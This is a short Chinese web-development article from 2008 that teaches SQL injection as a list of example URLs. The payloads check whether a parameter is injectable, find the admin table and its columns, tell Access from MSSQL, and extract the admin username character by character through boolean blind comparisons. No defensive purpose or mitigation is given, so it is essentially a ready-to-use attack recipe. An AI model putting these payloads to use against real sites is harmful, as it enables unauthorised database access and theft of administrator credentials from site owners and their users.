快速学习,理解.SQL注入技术
2008-10-27 16:51:19 来源:WEB开发网检测可否注入
http://127.0.0.1/xx?id=11 and 1=1 (正常页面)
http://127.0.0.1/xx?id=11 and 1=2 (出错页面)
检测表段的
http://127.0.0.1/xx?id=11 and exists (select * from admin)
检测字段的
http://127.0.0.1/xx?id=11 and exists (select username from admin)
检测ID
http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)
检测长度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)
检测长度的
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)
检测是否为MSSQL数据库
http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)
检测是否为英文
(ACCESS数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)
(MSSQL数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)
检测英文的范围
(ACCESS数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)
(MSSQL数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)
检测那个字符
(ACCESS数据库)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)
更多精彩
赞助商链接